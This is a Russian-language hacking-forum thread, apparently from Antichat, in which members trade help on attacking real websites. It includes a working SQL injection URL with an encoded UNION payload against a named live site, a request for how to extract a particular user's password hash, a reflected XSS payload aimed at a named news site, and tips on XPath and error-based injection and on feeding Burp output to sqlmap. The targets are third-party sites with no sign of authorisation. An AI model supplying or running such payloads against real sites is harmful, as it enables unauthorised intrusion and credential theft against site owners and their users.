Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. BlitzXX

    BlitzXX New Member

    Joined:
    5 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Можно реализовать XSS? Фильтруется только "<". ?
    Code:
    <a href="http://yandex.ru">Text</a>
    p\s gde text
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,681
    Likes Received:
    888
    Reputations:
    363
    не заметил ошибку, колонки header просто нет.
     
    _________________________
  3. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
  4. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    _________________________
  5. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Бинарарные операции практически эквивалентны в языках XPath и SQL.

    kostea
    , Почитайте про XPath: http://www.w3.org/TR/xpath/

    Пользуясь некоторыми функциями вы сможете доказать или опровергнуть наличие XPath-инъекции, однако это автоматом не означает, что там SQL. К примеру:
    Code:
    substring('12345',0,3)='12'
    substring-before('1999/04/01','/')='1999'
    если что-то не отработает, то значит, что это не XPath.
     
    grimnir likes this.
  6. segodnya

    segodnya New Member

    Joined:
    26 Oct 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
  7. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Используй ExtractValue . Все работает.
     
    _________________________
    Strilo4ka and segodnya like this.
  8. segodnya

    segodnya New Member

    Joined:
    26 Oct 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Пробую, не получается ничего вывести :(
    если можно в ЛС пожалуйста
     
  9. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    726
    Reputations:
    948
    там скуля в insert и усе легко крутится, ответили же
    Code:
    https://lk.ourmission.space/?ref=-393' and 0 /*!union*/ select 0x27262873656C656374202A2066726F6D2873656C656374206E616D655F636F6E73742876657273696F6E28292C31292C6E616D655F636F6E73742876657273696F6E28292C31292961292627-- -
     
    _________________________
    segodnya likes this.
  10. segodnya

    segodnya New Member

    Joined:
    26 Oct 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    спасибо, но не могу получить md5 пароль, определенного пользователя :( каким запросом это осуществить!
     
  11. Legionanonymous

    Legionanonymous New Member

    Joined:
    30 Dec 2015
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
  12. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    954
    Likes Received:
    1,239
    Reputations:
    42
    Парни, подскажите как в бурп сюте сохранить карту сайта для передаче sqlmapу. Может не карта сайта называется... что бы не краулить сайт по новой. Спасибо
     
  13. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    С помощью where
     
    _________________________
  14. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    954
    Likes Received:
    1,239
    Reputations:
    42
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,139
    Reputations:
    886
    _________________________
  16. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    954
    Likes Received:
    1,239
    Reputations:
    42
    не получается заюзать.
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,139
    Reputations:
    886
    что именно заюзать? вы видите там уязвимость?

    по соседству есть Reflected XSS

    Code:
    http://www.maltatoday.com.mt/ui_frontend/<svg onload=prompt(1)>
     
    _________________________
  18. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    954
    Likes Received:
    1,239
    Reputations:
    42
    xss видел , нельзя выполнить код на стороне сайта, Насколько я понял он должен открывать картинку , если там правильно подсунуть то там возможен rfi наверное... Я ошибаюсь?
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,139
    Reputations:
    886
    ошибаешься
     
    _________________________
  20. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    954
    Likes Received:
    1,239
    Reputations:
    42
    Окей. Спасибо.
     
Loading...